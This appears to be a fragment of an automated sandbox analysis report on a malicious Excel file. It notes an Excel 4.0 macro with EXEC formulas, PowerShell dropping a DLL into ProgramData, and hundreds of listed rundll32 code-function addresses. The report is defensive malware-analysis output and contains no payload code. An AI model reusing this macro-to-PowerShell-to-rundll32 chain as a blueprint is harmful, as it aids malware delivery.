............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
                            Powershell drops PE file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Found Excel 4.0 Macro with suspicious formulas
                            Source: 2022-28-01_1202.xlsInitial sample: EXEC
                            Source: 2022-28-01_1202.xlsInitial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100360079_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100410509_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003130F9_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100323E29_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100304609_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100415929_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003E59F9_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003960C9_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100317E29_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10040B0E9_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031BB69_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10041C569_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10036CB59_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001CD169_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10042D219_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031FC29_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037F8FD9_2_0037F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037E9919_2_0037E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037AB879_2_0037AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003790119_2_00379011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003800019_2_00380001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038907F9_2_0038907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003720519_2_00372051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003900569_2_00390056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003820BA9_2_003820BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003770B39_2_003770B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037F09B9_2_0037F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003841169_2_00384116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003781B79_2_003781B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003751BB9_2_003751BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003722519_2_00372251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038A2E89_2_0038A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037B2C79_2_0037B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037E2CC9_2_0037E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003753619_2_00375361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003743469_2_00374346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003913AD9_2_003913AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038C3A09_2_0038C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038E3959_2_0038E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038D3899_2_0038D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038F4359_2_0038F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038044F9_2_0038044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003764E29_2_003764E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003885199_2_00388519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037A55F9_2_0037A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003825509_2_00382550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003755489_2_00375548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003895FA9_2_003895FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037E5CF9_2_0037E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038C6319_2_0038C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003886069_2_00388606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038A6669_2_0038A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037D6D89_2_0037D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003866CA9_2_003866CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003777359_2_00377735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038473C9_2_0038473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003797149_2_00379714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038176B9_2_0038176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037B74D9_2_0037B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003748169_2_00374816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003818899_2_00381889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003789699_2_00378969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038894B9_2_0038894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003909B59_2_003909B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003759F29_2_003759F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038AA309_2_0038AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00371A569_2_00371A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037EA999_2_0037EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00378B3D9_2_00378B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038BB239_2_0038BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00380B199_2_00380B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037BB7E9_2_0037BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038CB5B9_2_0038CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00387BA69_2_00387BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00379B839_2_00379B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00384B879_2_00384B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038DBEA9_2_0038DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00388BE39_2_00388BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00372BD99_2_00372BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00389BCF9_2_00389BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00377C379_2_00377C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038AC3A9_2_0038AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00373C3C9_2_00373C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00390C149_2_00390C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00374C5D9_2_00374C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00386C499_2_00386C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038DCF79_2_0038DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00385CC49_2_00385CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00376D249_2_00376D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00386DF89_2_00386DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00387DD59_2_00387DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00379DCF9_2_00379DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00390E3A9_2_00390E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00373E3F9_2_00373E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038BE279_2_0038BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038AE6D9_2_0038AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00375E609_2_00375E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00380E539_2_00380E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037EE819_2_0037EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037AEFB9_2_0037AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00389EEC9_2_00389EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00374EE39_2_00374EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0038DEDC9_2_0038DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00390F339_2_00390F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037CF479_2_0037CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037DFF39_2_0037DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00377FF29_2_00377FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00373C3C10_2_00373C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037901110_2_00379011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038044F10_2_0038044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003820BA10_2_003820BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037F8FD10_2_0037F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037D6D810_2_0037D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038411610_2_00384116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003913AD10_2_003913AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037AB8710_2_0037AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003895FA10_2_003895FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003759F210_2_003759F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00377FF210_2_00377FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00377C3710_2_00377C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038AC3A10_2_0038AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00390E3A10_2_00390E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038AA3010_2_0038AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00373E3F10_2_00373E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038C63110_2_0038C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038F43510_2_0038F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038BE2710_2_0038BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037481610_2_00374816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00390C1410_2_00390C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038000110_2_00380001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038860610_2_00388606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038907F10_2_0038907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038AE6D10_2_0038AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00375E6010_2_00375E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038A66610_2_0038A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00371A5610_2_00371A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037205110_2_00372051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037225110_2_00372251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00374C5D10_2_00374C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00380E5310_2_00380E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0039005610_2_00390056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00386C4910_2_00386C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003770B310_2_003770B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037F09B10_2_0037F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037EA9910_2_0037EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038188910_2_00381889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037EE8110_2_0037EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037AEFB10_2_0037AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038DCF710_2_0038DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038A2E810_2_0038A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00389EEC10_2_00389EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00374EE310_2_00374EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003764E210_2_003764E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038DEDC10_2_0038DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037B2C710_2_0037B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003866CA10_2_003866CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037E2CC10_2_0037E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00385CC410_2_00385CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037773510_2_00377735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038473C10_2_0038473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00390F3310_2_00390F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00378B3D10_2_00378B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00376D2410_2_00376D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038BB2310_2_0038BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038851910_2_00388519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00380B1910_2_00380B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037971410_2_00379714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037BB7E10_2_0037BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038176B10_2_0038176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037536110_2_00375361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037896910_2_00378969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038CB5B10_2_0038CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037A55F10_2_0037A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038255010_2_00382550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037CF4710_2_0037CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037434610_2_00374346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038894B10_2_0038894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037B74D10_2_0037B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037554810_2_00375548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003781B710_2_003781B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003909B510_2_003909B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003751BB10_2_003751BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038C3A010_2_0038C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00387BA610_2_00387BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037E99110_2_0037E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038E39510_2_0038E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038D38910_2_0038D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00379B8310_2_00379B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00384B8710_2_00384B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00386DF810_2_00386DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037DFF310_2_0037DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038DBEA10_2_0038DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00388BE310_2_00388BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00387DD510_2_00387DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00372BD910_2_00372BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00389BCF10_2_00389BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00379DCF10_2_00379DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0037E5CF10_2_0037E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003600711_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004105011_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003130F11_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100323E211_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003046011_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004159211_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003E59F11_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003960C11_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100317E211_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10040B0E11_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031BB611_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10041C5611_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10036CB511_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001CD1611_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10042D2111_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031FC211_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027F8FD11_2_0027F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027E99111_2_0027E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027AB8711_2_0027AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028000111_2_00280001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027901111_2_00279011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028907F11_2_0028907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027205111_2_00272051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0029005611_2_00290056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002820BA11_2_002820BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002770B311_2_002770B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027F09B11_2_0027F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028411611_2_00284116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002781B711_2_002781B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002751BB11_2_002751BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027225111_2_00272251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028A2E811_2_0028A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027B2C711_2_0027B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027E2CC11_2_0027E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027536111_2_00275361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027434611_2_00274346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002913AD11_2_002913AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028C3A011_2_0028C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028D38911_2_0028D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028E39511_2_0028E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028F43511_2_0028F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028044F11_2_0028044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002764E211_2_002764E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028851911_2_00288519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027554811_2_00275548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027A55F11_2_0027A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028255011_2_00282550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002895FA11_2_002895FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027E5CF11_2_0027E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028C63111_2_0028C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028860611_2_00288606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028A66611_2_0028A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002866CA11_2_002866CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027D6D811_2_0027D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027773511_2_00277735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028473C11_2_0028473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027971411_2_00279714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028176B11_2_0028176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027B74D11_2_0027B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027481611_2_00274816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028188911_2_00281889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027896911_2_00278969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028894B11_2_0028894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002909B511_2_002909B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002759F211_2_002759F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028AA3011_2_0028AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00271A5611_2_00271A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027EA9911_2_0027EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028BB2311_2_0028BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00278B3D11_2_00278B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00280B1911_2_00280B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027BB7E11_2_0027BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028CB5B11_2_0028CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00287BA611_2_00287BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00279B8311_2_00279B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00284B8711_2_00284B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028DBEA11_2_0028DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00288BE311_2_00288BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00289BCF11_2_00289BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00272BD911_2_00272BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00277C3711_2_00277C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028AC3A11_2_0028AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00273C3C11_2_00273C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00290C1411_2_00290C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00286C4911_2_00286C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00274C5D11_2_00274C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028DCF711_2_0028DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00285CC411_2_00285CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00276D2411_2_00276D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00286DF811_2_00286DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00279DCF11_2_00279DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00287DD511_2_00287DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028BE2711_2_0028BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00290E3A11_2_00290E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00273E3F11_2_00273E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028AE6D11_2_0028AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00275E6011_2_00275E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00280E5311_2_00280E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027EE8111_2_0027EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00289EEC11_2_00289EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00274EE311_2_00274EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027AEFB11_2_0027AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028DEDC11_2_0028DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00290F3311_2_00290F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027CF4711_2_0027CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027DFF311_2_0027DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00277FF211_2_00277FF2
